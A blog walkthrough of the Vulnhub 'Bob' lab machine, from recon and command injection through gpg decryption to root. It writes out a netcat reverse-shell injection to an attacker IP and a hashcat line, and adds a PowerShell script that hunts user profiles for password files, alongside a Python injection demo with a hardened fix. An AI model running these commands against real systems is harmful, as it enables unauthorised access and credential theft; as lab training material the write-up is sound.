Vulnhub Bob: 1.0.1 Walkthrough
by Vince, in Blog
I banged my head a bit on this one. The low privilege shell was quick but the privilege escalation had me twisting for a while. This box is definitely a mixture of standard exploitation with a CTF twist. CTF is not really my thing but I enjoyed this box. It was clever and there were some components to it that are truer to life than some of the boxes that don't seem to have a purpose other than being a target.
Starting off with an Nmap scan:
Three ports are open, so I check FTP first. I can log in anonymously but I can't write, passive (PASV) mode gives me trouble, switching to pftp doesn't work at all, and I decide to move on. No images of me floundering.
Checking out the web port with Nikto:
I figured this would turn up something, and right away I have four things to check out.
Hitting the file with the promising name:
I already know that I want to bang on the input but I'm going to check out the other three first.
Checking out the memo:
Adding the username Bob to my list. Bob makes reference to the web shell, another juicy page to check out.
Let's see what we find with this one:
Yeah, hackers can't do anything with a hash: hashcat64.exe -m <hash mode> yourlamehash.txt rockyou.txt
And finally, the login page:
As I suspected, I'm heading back to dev_shell.php --
Let's see what happens when we ask for id:
Cool. Can we read /etc/passwd? :
Ha! I am a skid.
It's doing some filtering but can we get command execution:
There are a few separators you can try to inject. I tried a single semicolon, and I also tried the double pipe ||, which is "or if" (the second command only runs when the first one fails; since id succeeds, nothing after || ever runs). The "and if" separator, the double ampersand && (the second command runs only when the first succeeds), ended up working.
Viewing source should clean this up:
Five users, excellent.
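The filter-bypass logic above, as an added example that is not the box's real dev_shell.php (the page never shows its filter): a constructed blacklist that catches ";" and command substitution but forgets "&&" and "||", run against the same three payloads the walkthrough tried, next to a hardened version that allowlists the command word and never hands user input to a shell. The blacklist, the allowlist and the "echo PWNED" payloads are assumptions made for this illustration.

```python
"""Command-injection blacklist bypass (constructed example, not the box's code)."""
import shlex
import subprocess

# Assumed blacklist for illustration only; the real page's filter is unknown.
BLOCKED_TOKENS = (";", "`", "$(", "\n")

# Assumed allowlist of command words a "dev shell" might legitimately expose.
ALLOWED_COMMANDS = {"id", "whoami", "uname"}


def naive_filter_allows(cmd: str) -> bool:
    """True if the input contains none of the blacklisted separators."""
    return not any(tok in cmd for tok in BLOCKED_TOKENS)


def vulnerable_run(user_input: str) -> str:
    """The injectable pattern: blacklist a few separators, then run the whole
    string through /bin/sh, where '&&' and '||' still chain commands."""
    if not naive_filter_allows(user_input):
        return "blocked"
    proc = subprocess.run(user_input, shell=True, capture_output=True, text=True)
    return proc.stdout


def hardened_run(user_input: str) -> str:
    """Allowlist the command word and pass arguments as an argv list with
    shell=False, so '&&', '||' and friends become literal arguments that the
    allowlisted program receives and rejects, never operators."""
    try:
        argv = shlex.split(user_input)
    except ValueError:  # unbalanced quotes and similar junk
        return "blocked"
    if not argv or argv[0] not in ALLOWED_COMMANDS:
        return "blocked"
    proc = subprocess.run(argv, capture_output=True, text=True)
    return proc.stdout


if __name__ == "__main__":
    # Same three separators the walkthrough tried, in the same order.
    for payload in ("id; echo PWNED", "id || echo PWNED", "id && echo PWNED"):
        print(f"{payload!r:22} vulnerable -> {vulnerable_run(payload)!r}")
        print(f"{'':22} hardened   -> {hardened_run(payload)!r}")
```

Running it shows why the author's ordering played out the way it did: ";" is blocked outright, "||" passes the filter but never fires because id exits 0, and "&&" passes and fires. Had the first command failed (say, a typo'd command name), "||" would have worked just as well, which is why a blacklist of separators is never a real fix; the hardened version sidesteps the whole question by not invoking a shell.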
The syntax is too long but I go back to the input box and I enter the following:
id && nc -e /bin/bash 192.168.0.51 53
Setting up my listener:
Cool! Low privilege shell.
Let's see what we have in /home:
One that wasn't in the passwd output above: c0rruptedb1t.
Let's check out bob's home dir:
Let's see what we have here:
l00t!
Continuing with the enumeration of bob's home dir:
Looking at the note:
Bob is not a nice person.
He's also nested a bunch of folders so rather than digging into each, I'm going to look through them recursively:
Something juicy?
Let's take a look:
I have no idea what to do with this, so I home in on Cucumber and try to log in with it. That doesn't work, and neither does trying to open that gpg file with it.
Continuing to look around:
Elliot is also not a nice person.
Let's see what we have here:
More l00t.
At this point, I feel like this guy:
I start hunting for images:
I find two images on the web site and one in elliot's home dir and I check them for exif data. No joy.
I dig through the system and throw some kernel exploits at it, and get nothing.
I start thinking about this piece:
I start thinking about rudimentary crypto and then it dawns on me:
What if....
Thinking about the other piece of the puzzle, I wonder if this is my passphrase for gpg:
Bouncing around as I did, when I first tried the passphrase it gave me an error, because I was back as www-data, which has no writable home directory (gpg needs one to create its keyring and trust database; pointing it at a writable directory with --homedir should also get around this). Thought I'd just point that out. Su to jc, or any user with a writable home dir, and the file decrypts and yields the l00t.
Let's su to bob:
I su to bob, check sudoers, learn that bob has (ALL : ALL) ALL, and I'm golden.
One last thing to do:
Excellent box! Very clever. Wish I played more word puzzles, I might have solved this a lot sooner.
At first glance, you'd think: who would leave a password file on their computer? Users, that's who. Most of the users I deal with are on Windows machines running Microsoft Office, so I hunt for files named password*.docx and password*.xlsx, and you'd be surprised what turns up. There's at least one such user on every network. That gets me the "What am I supposed to do with all of these passwords..." conversation, which is where we talk about password managers.
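The hunt described above as an added PowerShell example (not the author's own tooling). It generalises the post's two patterns to a few other common formats; the default roots and name patterns are assumptions to adjust per engagement.

```powershell
# Added example, not from the original post: recursively hunt user profiles
# for password files by name. Roots and patterns are assumptions.
function Find-PasswordFiles {
    param(
        [string[]]$Roots = @('C:\Users'),
        [string[]]$Patterns = @('password*.docx', 'password*.xlsx',
                                'password*.txt',  'passwords*.*')
    )
    foreach ($root in $Roots) {
        if (-not (Test-Path -Path $root)) { continue }
        Get-ChildItem -Path $root -Recurse -Include $Patterns -File -Force `
                      -ErrorAction SilentlyContinue |
            Select-Object FullName, Length, LastWriteTime
    }
}

# Usage: point it at the local profiles, or at a mounted file share, and keep
# the list as evidence for the password-manager conversation.
Find-PasswordFiles | Export-Csv -Path .\password-files.csv -NoTypeInformation
```

-Force pulls in hidden files and -ErrorAction SilentlyContinue skips profiles you have no rights to, so it can run as an ordinary user; add UNC paths or other drive letters to -Roots to sweep shares.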